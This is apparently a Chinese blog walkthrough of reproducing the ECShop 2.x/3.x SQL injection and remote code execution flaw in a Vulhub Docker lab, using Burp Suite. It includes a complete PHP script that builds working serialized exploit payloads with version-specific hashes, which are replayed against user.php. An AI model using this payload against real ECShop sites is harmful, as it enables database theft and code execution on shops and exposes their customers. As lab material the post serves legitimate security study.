ECShop 2.x/3.x SQL注入/远程代码执行漏洞

该文详细描述了如何下载并使用Vulhub来复现ECShop的SQL注入漏洞。通过修改docker-compose.yml文件,设置环境,然后使用burpsuite拦截和重放请求,生成并应用PHP代码(POC)来触发漏洞。文章还提到了在过程中需要注意的端口冲突和证书信任问题。
摘要由CSDN通过智能技术生成

下载vulhub
wget https://github.com/vulhub/vulhub/archive/master.zip -O vulhub-master.zip

在这里插入图片描述

解压下载的zip文件

在这里插入图片描述

进入到/vulhub-master/ecshop/collection_list-sqli/将docker-compose.yml文件的ecshop版本改一下,不然是4.0版本,漏洞被更新了,实现不了。
在这里插入图片描述

进入到需要复现的漏洞的目录

在这里插入图片描述

这个需要docker-compose,安装docker-compose

在这里插入图片描述
我这个是已经安装过的了,没安装的显示是不一样的,命令就是这个

开启环境
在这里插入图片描述
其中我的mysql已经安装过了,没有显示,安装了ecshop2.7.3

访问http://本机ip:8080

在这里插入图片描述
配置系统

在这里插入图片描述
全绿就可以了

数据库主机:mysql,端口号:3306,用户名和密码都是root,其他的就随意。

在这里插入图片描述
安装成功
在这里插入图片描述

然后利用burpsuite拦截user.php页面,进行重新发包。
burpsuite不能用8080端口,因为被占用了,导入证书需要信任证书,勾选两个选项,我一开始没信任,导致抓不到包,浪费了不少时间。

在这里插入图片描述

利用下面php代码生成POC,

<?php
$shell = bin2hex("{\$asd'];phpinfo\t();//}xxx");
$id = "-1' UNION/*";
$arr = [
    "num" => sprintf('*/SELECT 1,0x%s,2,4,5,6,7,8,0x%s,10-- -', bin2hex($id), $shell),
    "id" => $id
];

$s = serialize($arr);

$hash3 = '45ea207d7a2b68c49582d2d22adf953a';
$hash2 = '554fcae493e564ee0dc75bdf2ebf94ca';

echo "POC for ECShop 2.x: \n";
echo "{$hash2}ads|{$s}{$hash2}";
echo "\n\nPOC for ECShop 3.x: \n";
echo "{$hash3}ads|{$s}{$hash3}";

启动本地phpstudy生成POC,如下。

在这里插入图片描述

跳转到用户登录界面,进行抓包

在这里插入图片描述
将POC复制,重新发包。
在这里插入图片描述
复现成功。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值